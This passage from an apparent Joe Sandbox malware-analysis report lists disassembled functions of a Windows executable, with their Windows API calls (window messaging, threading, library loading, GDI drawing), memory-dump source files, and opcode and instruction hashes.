                                                        • Instruction ID: 0cfe0c835ff12b9d4c19ad0df041c46c28e41a3b545d9e1956c493324db38d98
                                                        • Opcode Fuzzy Hash: ade8ca59d735241de9dfdd829d795d9ac1bf64ddd70be73e96eb503a7459bbb5
                                                        • Instruction Fuzzy Hash: 92119D32204614AFCB10AF29CC04EA63BA4AF473A4B255724F87DE72E1E731C951DB50
                                                        Function 00E85660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E856BB
                                                        • _wcslen.LIBCMT ref: 00E856CD
                                                        • _wcslen.LIBCMT ref: 00E856D8
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E85816
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_wcslen
                                                        • String ID:
                                                        • API String ID: 455545452-0
                                                        • Opcode ID: 822eb1a3fa078d1b0ec8f14bbeb4b521c3800a61b1dd347c1d25e226b6ad42fe
                                                        • Instruction ID: 407477890656b36e8bd0afb0f9dbd97d65eb42ee3f91cbf6f70bab8db2158894
                                                        • Opcode Fuzzy Hash: 822eb1a3fa078d1b0ec8f14bbeb4b521c3800a61b1dd347c1d25e226b6ad42fe
                                                        • Instruction Fuzzy Hash: 6511D676600605D6DF20AF61CC85AEE77ACEF51764B10506AF92EF6081EF70C984CB60
                                                        Function 00E51A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00E51A47
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E51A59
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E51A6F
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E51A8A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 393a7dc483452cf24290b7fec02a52166b7e201a132b805f9ad1f2148ff70c95
                                                        • Instruction ID: 1e8172d47f0008f162e4e42adc1551f87ae19f1befac2a8fdbcf0b49da246298
                                                        • Opcode Fuzzy Hash: 393a7dc483452cf24290b7fec02a52166b7e201a132b805f9ad1f2148ff70c95
                                                        • Instruction Fuzzy Hash: 3511393AD01219FFEB11DBA5CD85FADBB78EB08750F2004A1EA04B7290D6716E50DB94
                                                        Function 00E5E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00E5E1FD
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00E5E230
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E5E246
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E5E24D
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: d255b3dab621c211f536b7e110369b78b14b66a528675828e3a783638dd880f1
                                                        • Instruction ID: a1b409da58c101bcfbabdca32185c2010670db7afbb73326319aeb5bd84c977c
                                                        • Opcode Fuzzy Hash: d255b3dab621c211f536b7e110369b78b14b66a528675828e3a783638dd880f1
                                                        • Instruction Fuzzy Hash: 2911E576904254AFC7059BA9AC09E9A7BAC9B46315F1046A5F824F3391D6B18A0887A0
                                                        Function 00E1D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,?,00E1CFF9,00000000,00000004,00000000), ref: 00E1D218
                                                        • GetLastError.KERNEL32 ref: 00E1D224
                                                        • __dosmaperr.LIBCMT ref: 00E1D22B
                                                        • ResumeThread.KERNEL32(00000000), ref: 00E1D249
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                        • String ID:
                                                        • API String ID: 173952441-0
                                                        • Opcode ID: 08c2c5f938f02978e4eb364aebbeaa70e672e32a577b84888c5f159c06e39806
                                                        • Instruction ID: ab0b18b2894f36b6dcd0080339800f651008d0a311f552d0bc73a1502e63f84b
                                                        • Opcode Fuzzy Hash: 08c2c5f938f02978e4eb364aebbeaa70e672e32a577b84888c5f159c06e39806
                                                        • Instruction Fuzzy Hash: 4701D636509204BBC7115BA5DC09BEA7BA9DF86730F201359F925B21E0DB718985C7A0
                                                        Function 00DF600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DF604C
                                                        • GetStockObject.GDI32(00000011), ref: 00DF6060
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF606A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CreateMessageObjectSendStockWindow
                                                        • String ID:
                                                        • API String ID: 3970641297-0
                                                        • Opcode ID: 97fda58bbb2b68de802d2c85ecaa1cf10397f3c5f8e307902544537948e09f22
                                                        • Instruction ID: 604d86eddf37913e4ee2716cb7ab767614441d0772f87621d0edd2ffc87e7389
                                                        • Opcode Fuzzy Hash: 97fda58bbb2b68de802d2c85ecaa1cf10397f3c5f8e307902544537948e09f22
                                                        • Instruction Fuzzy Hash: 3E115B7250150DBFEF124FA59C44EFABB69EF093A4F254216FA1562520DB32DC60EBA0
                                                        Function 00E13B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00E13B56
                                                          • Part of subcall function 00E13AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00E13AD2
                                                          • Part of subcall function 00E13AA3: ___AdjustPointer.LIBCMT ref: 00E13AED
                                                        • _UnwindNestedFrames.LIBCMT ref: 00E13B6B
                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00E13B7C
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00E13BA4
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                        • String ID:
                                                        • API String ID: 737400349-0
                                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                        • Instruction ID: 1870eac610365dd052cf8153bc5c3e89bf6920c3bd9994aa759209861df41e17
                                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                        • Instruction Fuzzy Hash: BB014C72100148BBDF125EA5CC42EEB7FADFF48758F045014FE5866121D732E9A1EBA0
                                                        Function 00E23073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00DF13C6,00000000,00000000,?,00E2301A,00DF13C6,00000000,00000000,00000000,?,00E2328B,00000006,FlsSetValue), ref: 00E230A5
                                                        • GetLastError.KERNEL32(?,00E2301A,00DF13C6,00000000,00000000,00000000,?,00E2328B,00000006,FlsSetValue,00E92290,FlsSetValue,00000000,00000364,?,00E22E46), ref: 00E230B1
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E2301A,00DF13C6,00000000,00000000,00000000,?,00E2328B,00000006,FlsSetValue,00E92290,FlsSetValue,00000000), ref: 00E230BF
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 2c6bfbbe000a1df267edfd8b8b6096fa90804b38bfa9c04c4196b8909ceefc60
                                                        • Instruction ID: 51fdaa74b9232e0eb888280b911276e85722bb3e5101bbf7a6203ba63775706f
                                                        • Opcode Fuzzy Hash: 2c6bfbbe000a1df267edfd8b8b6096fa90804b38bfa9c04c4196b8909ceefc60
                                                        • Instruction Fuzzy Hash: 6A01D432701636AFCB214A7ABC44E577B98AF06B65B200621F909F3190C735D945CBF0
                                                        Function 00E57464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00E5747F
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E57497
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E574AC
                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00E574CA
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                        • String ID:
                                                        • API String ID: 1352324309-0
                                                        • Opcode ID: 23d6d41ab0b223f7f0143c4dd63bf8eddac3f6afa3ff9631e8f0e0093feed609
                                                        • Instruction ID: 94c430ab415a0f61d719fc9544ca3df0406e5d5c6db20d8cfbbe24ff9ade4029
                                                        • Opcode Fuzzy Hash: 23d6d41ab0b223f7f0143c4dd63bf8eddac3f6afa3ff9631e8f0e0093feed609
                                                        • Instruction Fuzzy Hash: 9A11A1B12053109FE7208F24EC08F927FFCEB00B05F108969AEAAE6151D770E958DB61
                                                        Function 00E5B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E5ACD3,?,00008000), ref: 00E5B0C4
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E5ACD3,?,00008000), ref: 00E5B0E9
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E5ACD3,?,00008000), ref: 00E5B0F3
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E5ACD3,?,00008000), ref: 00E5B126
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: 58f0c9c1e98ef2e7fead6000daa8661ea796700179b47bf22bb300535988dd8e
                                                        • Instruction ID: e868f9593a416c620ee124670d0f9553843d2f964f8ea3ae0772652a6a2b3ddb
                                                        • Opcode Fuzzy Hash: 58f0c9c1e98ef2e7fead6000daa8661ea796700179b47bf22bb300535988dd8e
                                                        • Instruction Fuzzy Hash: F7115E31C0292CDBCF04AFE6DA986EEBB78FF0A712F105895D941B2285CB3055588B61
                                                        Function 00E52DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E52DC5
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E52DD6
                                                        • GetCurrentThreadId.KERNEL32 ref: 00E52DDD
                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E52DE4
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: 2493044897ee6163b2558937e54f8a9ae5188b8d103c9c6ded34d8d84d0b38f1
                                                        • Instruction ID: 8804d1161a4e51494dba325be8b750c82fd4fb904bac1ad6c0f1004a36d906aa
                                                        • Opcode Fuzzy Hash: 2493044897ee6163b2558937e54f8a9ae5188b8d103c9c6ded34d8d84d0b38f1
                                                        • Instruction Fuzzy Hash: B9E065711012247BD72017639C0DEE73E6CEB43F62F101519B60AF104096A48448D7B0
                                                        Function 00E88863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E09693
                                                          • Part of subcall function 00E09639: SelectObject.GDI32(?,00000000), ref: 00E096A2
                                                          • Part of subcall function 00E09639: BeginPath.GDI32(?), ref: 00E096B9
                                                          • Part of subcall function 00E09639: SelectObject.GDI32(?,00000000), ref: 00E096E2
                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00E88887
                                                        • LineTo.GDI32(?,?,?), ref: 00E88894
                                                        • EndPath.GDI32(?), ref: 00E888A4
                                                        • StrokePath.GDI32(?), ref: 00E888B2
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: f296a705e98647afd366851b9716b6fac59f52a2b4c7858b7bded5cfe8fcb91f
                                                        • Instruction ID: 40cfde39dfbc8ad8d0d6712558b1ec8ded99d71ef938e43da1aaaf75658a5ef6
                                                        • Opcode Fuzzy Hash: f296a705e98647afd366851b9716b6fac59f52a2b4c7858b7bded5cfe8fcb91f
                                                        • Instruction Fuzzy Hash: 67F09A36001218BADB122F95AC09FCE3A69AF06350F508000FA09750E2C7B50515CBE5
                                                        Function 00E098B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 00E098CC
                                                        • SetTextColor.GDI32(?,?), ref: 00E098D6
                                                        • SetBkMode.GDI32(?,00000001), ref: 00E098E9
                                                        • GetStockObject.GDI32(00000005), ref: 00E098F1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Color$ModeObjectStockText
                                                        • String ID:
                                                        • API String ID: 4037423528-0
                                                        • Opcode ID: 28028b6a7d80db7eaf6d9c80e8d926979852f0888dd2e55f613f8afa99a46aaf
                                                        • Instruction ID: 9483e6d80cb1c65491251910ddc608000693afa2d1e9c5877528dc3899826a88
                                                        • Opcode Fuzzy Hash: 28028b6a7d80db7eaf6d9c80e8d926979852f0888dd2e55f613f8afa99a46aaf
                                                        • Instruction Fuzzy Hash: D1E06D31244280AEDB215F75BC0DBE83F21AB5233AF24821AF6FE680E2C37146449B20
                                                        Function 00E5162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 00E51634
                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00E511D9), ref: 00E5163B
                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E511D9), ref: 00E51648
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00E511D9), ref: 00E5164F
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CurrentOpenProcessThreadToken
                                                        • String ID:
                                                        • API String ID: 3974789173-0
                                                        • Opcode ID: 4f7744f7a0a35e0c752232abd6b86931577a3aef5686355cb7e6e2489ab9af89
                                                        • Instruction ID: 7602851fcec06b4dca36e8b70b8eebf1bf05a43eee6260256683a649875ce5ae
                                                        • Opcode Fuzzy Hash: 4f7744f7a0a35e0c752232abd6b86931577a3aef5686355cb7e6e2489ab9af89
                                                        • Instruction Fuzzy Hash: DCE08631601211DFD7201FF2AD0DB463B7CAF467D6F254848F649E9090E6744449C770
                                                        Function 00E4D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00E4D858
                                                        • GetDC.USER32(00000000), ref: 00E4D862
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E4D882
                                                        • ReleaseDC.USER32(?), ref: 00E4D8A3
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 94b6e2fd830db71acfb564bf8c28064937bfb5e403063bb90806b5be87907fb7
                                                        • Instruction ID: ee71cf33ace6d39fbadb8c23a4987c348e73c22347eac9009051bd864be40d08
                                                        • Opcode Fuzzy Hash: 94b6e2fd830db71acfb564bf8c28064937bfb5e403063bb90806b5be87907fb7
                                                        • Instruction Fuzzy Hash: 8BE0E5B4804205DFCB419FA1AD0866DBBB2EF49710B209019E90AB7260D7384946AF60
                                                        Function 00E4D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDesktopWindow.USER32 ref: 00E4D86C
                                                        • GetDC.USER32(00000000), ref: 00E4D876
                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E4D882
                                                        • ReleaseDC.USER32(?), ref: 00E4D8A3
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: 0fdc6f0c53801efae2e5fb4aff7101b89ae47467f55d3c6d526a05d0a789dfba
                                                        • Instruction ID: 80271ca3657c646f265f46e59f82aecc457c1dd407bc11b4a7adecff37955148
